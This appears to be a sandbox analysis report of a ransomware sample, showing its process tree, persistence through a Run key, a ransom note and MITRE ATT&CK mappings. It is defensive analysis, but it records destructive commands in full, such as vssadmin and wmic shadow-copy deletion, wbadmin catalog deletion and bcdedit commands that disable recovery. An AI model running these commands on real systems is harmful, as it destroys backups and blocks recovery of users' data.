C:\Users\Admin\AppData\Local\Temp\5FC5.exeC:\Users\Admin\AppData\Local\Temp\5FC5.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 2282⤵
- Program crash
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3068 -ip 30681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3564 -ip 35641⤵
-
C:\Users\Admin\AppData\Local\Temp\BE23.exeC:\Users\Admin\AppData\Local\Temp\BE23.exe1⤵
- Adds Run key to start application
- Enumerates connected drives
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 03⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\BE23.exe"C:\Users\Admin\AppData\Local\Temp\BE23.exe" -agent 02⤵
- Drops file in Program Files directory
- Drops file in Windows directory
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 8722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1504 -ip 15041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6120 -ip 61201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7136 -ip 71361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5188 -ip 51881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6156 -ip 61561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6572 -ip 65721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6516 -ip 65161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 8528 -ip 85281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6116 -ip 61161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10052 -ip 100521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2504 -ip 25041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 10108 -ip 101081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 9488 -ip 94881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 8524 -ip 85241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 7340 -ip 73401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4716 -ip 47161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 7616 -ip 76161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4664 -ip 46641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 10008 -ip 100081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 9768 -ip 97681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7224 -ip 72241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7156 -ip 71561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8548 -ip 85481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6744 -ip 67441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5856 -ip 58561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 11424 -ip 114241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 15636 -ip 156361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5556 -ip 55561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 15072 -ip 150721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 12056 -ip 120561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File Deletion
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
844KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
296KB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
88KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
6.1MB
-
Filesize
12KB
-
Filesize
6.1MB
-
Filesize
8KB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
88KB
-
Filesize
6.1MB
-
Filesize
36KB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
572KB
-
Filesize
88KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
1.2MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
188KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
572KB
-
Filesize
6.1MB
-
Filesize
40KB
-
Filesize
6.1MB
-
Filesize
9.1MB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
1.9MB
-
Filesize
728KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
860KB